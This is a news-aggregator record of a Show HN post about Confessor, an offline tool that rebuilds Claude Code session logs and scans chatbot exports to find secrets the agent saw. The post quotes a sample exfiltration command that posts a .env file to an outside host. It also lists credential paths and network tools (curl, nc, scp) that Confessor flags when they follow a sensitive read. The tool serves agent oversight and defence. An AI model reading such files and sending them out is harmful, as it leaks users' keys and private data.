{"slug": "show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc", "title": "Show HN: Confessor – replay what private info Claude Code accessed on your PC", "summary": "A developer released Confessor, an open-source tool that reconstructs the history of AI coding agents like Claude Code from local session logs to reveal every file read, command run, and secret accessed, flagging potential data exfiltration chains. The tool runs after the fact with no daemon or network calls, and also scans ChatGPT, Claude, and Gemini exports for exposed secrets.", "body_md": "*See what your AI coding agent actually did on your computer.*\n\nYou've been letting an AI coding agent run on your computer. Claude Code, and\nthe ones like it, can read any file your user account can — your `.env`\n\n, your\n`~/.ssh`\n\nkeys, your browser's saved passwords, that folder of tax PDFs — and\nthey can also run shell commands and reach the network. Most of the time they\ndo exactly what you asked. But you don't actually know that. You know it\nfinished the task.\n\nConfessor tells you what it did. It reconstructs the agent's whole history\nfrom the session logs already sitting on your disk — every file it opened,\nevery command it ran, every secret that passed through its context, and\neverywhere it could have sent data — and it flags the thing you actually care\nabout: **a sensitive file read, followed by a network call in the same\nsession.** Data in, a way out, right after.\n\nHere's the moment that made me build this. From the [sample report](https://ninjahawk.github.io/Confessor/)\n(generated from planted fake data, so it's safe to publish):\n\nThe agent read `.env`\n\n— three live keys inside — and fifteen seconds later ran\n`curl -X POST … -d @.env`\n\nto a host that isn't yours. This is not proof\nanything was stolen. It's a lead, and it's exactly the question you can't\nanswer today: *did my stuff leave?* Confessor surfaces every instance and lets\nyou judge.\n\nIt also just lists, plainly, every sensitive file the agent opened and why each one stands out:\n\nThe tools in this space are compliance loggers — you wrap the agent, they\nstream events to a dashboard, you read audit trails. Confessor is the\nopposite: **nothing to install alongside the agent, nothing running, no\ndaemon.** The logs are already on your disk. You run one command, after the\nfact, and get the forensic picture — including the read-then-exfiltrate\nchains, which the loggers don't connect for you. And it makes zero network\ncalls itself, which is the only honest way to ship a tool whose whole job is\ntelling you what touched your secrets.\n\nThe same detection engine runs over your ChatGPT, Claude, and Gemini exports — every API key you pasted at 2am, every phone number, every salary negotiation and medical question — and grades how much you've handed to each provider, with plain instructions to rotate and delete. It's the same \"oh no\" in a different place. (I ran it on my own history and got an F.)\n\nYou need Node ≥ 18.17. Then:\n\n```\nnpx confessor\n```\n\nWith no arguments it finds your local Claude Code logs (`~/.claude/projects`\n\n),\nreconstructs what the agent did, scans the content, writes\n`confessor-report.html`\n\n, and opens it. To include your chat services, download\nan export and point at it:\n\n| Source | Where to get it | Then |\n|---|---|---|\n| Claude Code | already on your disk | `npx confessor` |\n| ChatGPT | chatgpt.com → Settings → Data controls → Export data | `npx confessor ~/Downloads/chatgpt-export.zip` |\n| Claude | claude.ai → Settings → Privacy → Export data | `npx confessor ~/Downloads/claude-export.zip` |\n| Gemini | takeout.google.com → \"My Activity\" | `npx confessor ~/Downloads/Takeout` |\n\nFlags: `--json`\n\n(machine-readable), `--out <file>`\n\n, `--no-open`\n\n, `--quiet`\n\n,\nand `--fail-on critical|high|medium`\n\n, which exits non-zero — drop it in CI to\nfail a build that leaked a secret into a chat or an agent log.\n\n**Agent reconstruction.** Claude Code writes every session to\n`~/.claude/projects/**/*.jsonl`\n\n— one JSON event per line, including each tool\ncall and its result. Confessor replays them in order and pulls out:\n\n**Files** it read, wrote, or edited (from`Read`\n\n/`Write`\n\n/`Edit`\n\n, and from`cat`\n\n/`cp`\n\n/etc. inside`Bash`\n\n), each classified by a path ruleset —`.env`\n\n,`~/.ssh/id_rsa`\n\n,`.aws/credentials`\n\n, browser password stores, shell history, tax/medical/financial documents by name.**Secrets in context**— the detection engine runs over each tool*result*(what actually entered the model's context window), so a`cat .env`\n\nthat returned three keys is counted as three keys the agent saw.**Sinks**— every way off the machine:`WebFetch`\n\n/`WebSearch`\n\n, network shell commands (`curl`\n\n,`wget`\n\n,`scp`\n\n,`nc`\n\n,`git push`\n\n…), and MCP tool calls to outside servers.**Exposure paths**— within a session, a sensitive read or a secret-in-result followed by an external sink, paired with the time gap between them.\n\n**Detection.** Three layers of plain rules: 30 secret patterns (vendor tokens,\nkey blocks, DB URIs, JWTs), 13 structured-PII patterns (emails, cards with a\nLuhn check, SSNs gated on nearby context), and 7 topic lexicons for sensitive\nsubjects. No ML — every flag points at the one rule that fired.\n\n**Redaction is structural.** Every secret value, whether it came from a chat or\nscrolled past in a tool result, is routed through a redactor before anything is\nstored. The report shows `sk_live_…MPLE`\n\n, never the key.\n\nA tool that audits your secrets has no business being trusted on faith, so the guarantees are mechanical:\n\n**Zero network calls.** No code in`src/`\n\nmay import a network module or call`fetch`\n\n. A[static check](/ninjahawk/Confessor/blob/main/scripts/no-network-check.mjs)enforces it in CI on every commit and before every publish.**Zero runtime dependencies.** Same check fails if`package.json`\n\ngrows one. The zip reader for chat exports is written from scratch on`node:zlib`\n\n.**No full secret ever appears in the output.** A test renders a report from fixtures full of planted secrets and asserts not one of them appears, including the ones read out of the agent's tool results.**The report is one offline HTML file**— no CDN, no fonts, no fetches, with a CSP that blocks external loads even if something tried.\n\nRun it with your wifi off. Read the source — it's ~4,000 lines with nothing to hide behind.\n\nAn exposure path is a **lead, not a verdict.** \"Read `.env`\n\n, then made a network\ncall\" is worth investigating; it is not proof of theft — the agent may have had\nevery reason. Confessor shows you the pattern and the timing and lets you\ndecide. Detection is rules, not a model, so a novel secret format or a\ncleverly-worded disclosure can slip through. The agent reconstruction currently\nunderstands Claude Code's log format; other agents are on the roadmap. And it is\nretrospective — it reports what already happened, it does not intercept in real\ntime (that's a different, heavier tool).\n\nFound a false positive or a format it misreads? Open an issue — most fixes are one line.\n\nMIT.", "url": "https://wpnews.pro/news/show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc", "canonical_source": "https://github.com/ninjahawk/Confessor", "published_at": "2026-07-12 02:09:58+00:00", "updated_at": "2026-07-12 02:35:16.340703+00:00", "lang": "en", "topics": ["ai-agents", "ai-safety", "ai-ethics", "developer-tools", "ai-tools"], "entities": ["Confessor", "Claude Code", "ChatGPT", "Claude", "Gemini", "Node"], "alternates": {"html": "https://wpnews.pro/news/show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc", "markdown": "https://wpnews.pro/news/show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc.md", "text": "https://wpnews.pro/news/show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc.txt", "jsonld": "https://wpnews.pro/news/show-hn-confessor-replay-what-private-info-claude-code-accessed-on-your-pc.jsonld"}}